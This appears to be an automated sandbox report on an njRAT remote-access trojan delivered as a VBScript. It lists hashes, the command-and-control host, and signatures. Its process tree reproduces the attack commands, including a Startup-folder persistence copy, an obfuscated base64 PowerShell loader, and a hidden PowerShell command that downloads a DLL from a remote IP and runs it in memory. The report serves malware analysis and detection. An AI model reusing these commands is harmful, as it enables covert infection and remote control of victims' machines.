Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
06-01-2022 09:50
General
-
Target
NJ en lo que regresa.vbs
-
Size
484KB
-
MD5
cfe8083b99457520d371e972f4d340a9
-
SHA1
e11e37e2b04513bc50632265e4b81b24209ddd04
-
SHA256
9932a9c3c258842f413e5866e866cf504affb707fbb37fcf02506c54e40f1f21
-
SHA512
021c64c5762b6a75ee9fcabbe33656c49a259f427e94f754e53c31b20a5f2033ec925b114558cdd7ed34477e471a0850eafd8c046dee2961e47a236c2bbd6a64
Malware Config
Extracted
http://149.56.200.165/dll/3.txt
Extracted
njrat
0.7NC
NYAN CAT
venomsi.mypsx.net:81
4c6c9a1bbdc34e6ebe
-
reg_key
4c6c9a1bbdc34e6ebe
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 2 IoCs
-
Drops startup file 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪EE➠⇗↪UwBB➠⇗↪EM➠⇗↪M➠⇗↪➠⇗↪y➠⇗↪CU➠⇗↪V➠⇗↪BB➠⇗↪FI➠⇗↪SgBO➠⇗↪D➠⇗↪➠⇗↪Mg➠⇗↪l➠⇗↪DQ➠⇗↪Ng➠⇗↪w➠⇗↪DI➠⇗↪JQBl➠⇗↪HM➠⇗↪YQBi➠⇗↪C8➠⇗↪VwBF➠⇗↪E4➠⇗↪YQBz➠⇗↪GE➠⇗↪QwBj➠⇗↪HQ➠⇗↪YQBy➠⇗↪Eo➠⇗↪Tg➠⇗↪v➠⇗↪Gc➠⇗↪cgBv➠⇗↪C4➠⇗↪NQB1➠⇗↪GU➠⇗↪LgBh➠⇗↪HM➠⇗↪cwBh➠⇗↪GM➠⇗↪d➠⇗↪Bh➠⇗↪HI➠⇗↪agBu➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
d8c3c4611ad156dee7cdf45de540f56e
SHA1d351c56876ff17f84e3875cbcd049e720448dad9
SHA2568023cc85f0b97ffbc2c1b958ee4ea8627e0ea56c45f5f9db6e1a93647e20bb44
SHA5122ae0258514271b2a135a2668ecf5b17c391bca69a2e0fae267080ddba900e3e1e5ac7d1fd4039fba2ddead047f3e5545a88872c1843d9659c2ed82238d89bced
-
MD5
25edd5c58becb7f16ab5892f6f5a1b1b
SHA1c5a343c1ac1d396c1c99548d6fbbc0f7a064e54d
SHA2560a963d49ebb1e32def491838129a76341ea1094e99d5de33377285bfbeaf0817
SHA5120786aa8d2356e41a9861465646977fa57dcde0d37057cfc49e1ca3a68e8b2169097bdd181e6b152c7db1950a4dd560d8399ba112bd7db01c7eabe75d3f69a6b6
-
Filesize
48KB
-
Filesize
5.0MB
-
Filesize
624KB
-
Filesize
584KB
-
Filesize
48KB
-
Filesize
5.0MB
-
-
Filesize
48KB
-
Filesize
40KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
328KB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-